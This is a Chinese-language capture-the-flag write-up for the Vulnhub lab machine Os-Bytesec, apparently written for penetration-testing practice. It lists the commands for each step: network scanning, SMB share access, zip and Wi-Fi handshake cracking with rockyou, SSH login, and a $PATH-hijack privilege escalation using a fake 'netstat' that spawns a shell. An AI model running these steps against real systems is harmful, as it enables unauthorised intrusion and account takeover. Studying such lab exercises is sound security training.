一、前言

通过大量vulnhub受控靶机积累一线攻防经验和技巧。

二、环境

靶机名称：Os-Bytesec

靶机难度：初学者/中级

目标：有两个flag，一个user-flag，一个root-flag

攻击机：kali linux，IP地址192.168.101.70

靶机：os-bytesec，IP地址192.168.101.131

三、挑战过程

1.网段存活IP发现——

nmap -sP 192.168.101.1/24

图一

2.端口探测——

nmap -v -A -sV -T4 -p 1-65535 192.168.101.131

图二

3.应用服务探索——

首先我们对web应用服务搜寻风险点

图三

尝试了该web的所有链接和功能点没有突破口后，我尝试了目录爆破探索可能未发现的web风险

dirb http://192.168.101.131

图四

很遗憾，没有发现什么有价值的web目录，接下来留给我们的只剩下其余几点，web提到的smb和2525-ssh爆破。

了解了一下smb共享服务，我在这使用smbclient进行相关尝试。

smbclient //192.168.101.131/smb -U smb

smbclient//ip/myshare -U xxxx #连接服务器

cd 'path\to\remore\dir'

lcd '~/path/to/download/to'    #进入本地目标文件夹

mget *    #下载用mget

mput *    #上传用mput

图五

通过smb的爆破登录访问共享文件资源并探索这些文件是否有敏感信息可供我们进一步获取更多权限。

图六

通过对压缩文件爆破后获取里面的敏感内容

fcrackzip -D -p ./rockyou.txt -u safe.zip

图七

我们发现有个网络包，用wireshark打开查看

图八

显然，这是个无线数据包，我们使用aircrack-ng进行破解尝试

aircrack-ng -w ./rockyou.txt user.cap

图九

尝试登陆目标服务器并进一步探索

ssh blackjax@192.168.101.131 -p 2525

图十

4.提权

尝试sudo结果失败，查找系统的版本号期待有相关主机提权漏洞也遗憾告终，最终通过操纵$PATH变量提权。

find / -perm -u=s -type f 2>/dev/null

cd /tmp 

echo "/bin/sh" > netstat

chmod 777 netstat 

echo $PATH 

export PATH=/tmp:$PATH 

cd /usr/bin 

./netscan 

whoami

图十一

图十二

图十三

四、总结

风险点：

1.Win or Linux的SMB共享（smbclient）——web页面有提示

2.802.11的无线数据包密码破解

3.利用$PATH变量提权

五、疑问点

1.【low】smbclient的共享文件访问尝试对于其目录和账号密码获取比较模糊，爆破应该是写个脚本自动化爆破尝试，参考的文章显然不是

参考链接

1.https://www.freebuf.com/articles/system/221949.html

2.https://blog.csdn.net/weixin_44627799/article/details/111591454

3.https://www.anquanke.com/post/id/146799